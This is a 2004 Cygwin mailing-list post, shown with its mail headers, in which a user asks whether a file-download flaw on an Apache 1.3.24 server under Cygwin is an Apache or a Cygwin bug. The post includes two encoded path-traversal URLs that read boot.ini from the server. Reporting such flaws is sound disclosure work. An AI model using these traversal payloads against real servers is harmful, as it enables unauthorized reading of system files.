Mailing-List: contact cygwin-help AT cygwin DOT com; run by ezmlm List-Subscribe: List-Archive: List-Post: List-Help: , Sender: cygwin-owner AT cygwin DOT com Mail-Followup-To: cygwin AT cygwin DOT com Delivered-To: mailing list cygwin AT cygwin DOT com From: "=?ks_c_5601-1987?B?uei787/sXChCYWUsIFNhbmctV29vXCk=?=" To: Subject: Apache 1.3.24 vulnerability? Date: Tue, 13 Jan 2004 14:07:39 +0900 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="ks_c_5601-1987" Note-from-DJ: This may be spam Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from base64 to 8bit by delorie.com id i0D57Non008807 I've experienced below security problems on cygwin environment. you can download any files on web server. http://[server]/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini http://[server]/..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini is this a Apache 1.3.24 bug or a cygwin bug?